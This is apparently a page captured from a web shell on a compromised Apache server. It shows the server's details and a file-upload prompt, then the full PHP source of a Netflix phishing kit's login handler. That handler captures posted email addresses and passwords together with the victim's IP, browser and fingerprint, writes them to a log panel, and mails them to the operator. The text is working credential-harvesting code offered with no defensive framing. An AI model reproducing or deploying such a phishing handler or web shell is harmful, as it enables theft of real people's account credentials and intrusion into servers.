AVRIL_START_JANCOKALIVEAVRIL_END_JANCOK
| Server IP : 146.190.157.162 / Your IP : 216.73.216.175 Web Server : Apache System : Linux ubuntu-s-2vcpu-4gb-amd-sfo3-01-KIT-DIGITAL 6.5.0-44-generic #44-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 7 15:10:09 UTC 2024 x86_64 User : vergeskit ( 679) PHP Version : 8.2.10-2ubuntu2.2 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_signal,pcntl_signal_dispatch,pcntl_getpriority,pcntl_setpriority,dl,putenv,parse_ini_file,show_source MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/html/vergeskit/Config/net/system/ |
Upload File : |
<?php
/*
SUPER D
*/
@ini_set('display_errors', 'on');
require 'detect.php';
include '../../config.php';
$IP = getenv("REMOTE_ADDR");$date = date("d M, Y");$times = date("g:i a");$code = $_SESSION['ip_countryCode']=clientData('code');$country = strtolower($code);
if(isset($_POST['eml'])&&isset($_POST['pss'])){session_start();
$usern=$_POST['eml'];$passw=$_POST['pss'];$screen=$_POST['screen'];$brow = $_SESSION['browser'];$sys = $_SESSION['os'];$useragent = $_SERVER['HTTP_USER_AGENT'];
$msg= "
[+]━━━━━━━━━━━━【🔑 login】━━━━━━━━━━━━━━━━━━━[+]
[👤 user] = ".$usern."
[👤 pass] = ".$passw."
[+]━━━━━━━━━━━━━━━━【💻 System】━━━━━━━━━━━━━━━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP=".$IP."
[⏰ TIME/DATE] =".$times." / ".$date."
[🌐 BROWSER] = ".$brow." and ".$sys."
[🖖 FINGERPRINT] = ".$screen." and ".$useragent." ";
$msght = "<tr>
<td width='80'>
<p align='center'><img src='https://www.countryflags.io/".$_SESSION['ip_countryCode']."/flat/24.png'> " . $IP . "</th>
<td width='80'>
<p align='center'>" . $_POST['eml'] . "</th>
<td width='80'>
<p align='center'>" . $_POST['pss'] . "</th>
<td width='80'>
<p align='center'>" . $screen . " - " . $brow ." on " . $sys . "</th>
<td width='30'>
<p align='center'>" . $useragent . "</th>
<td width='60'>
<p align='center'>".$times." / ".$date."</th>
</font></th></tr>";
$save=fopen("../panel/log" . $namerand . ".html", "a+");fwrite($save, $msght);fclose($save);
$subject = " [ NETFLIX LOGIN ] / ".$IP." / Super 'D' ";$headers = "From: NETFLIX\r\n";mail($yourmail, $subject, $msg, $headers);include("api.php");
}
?>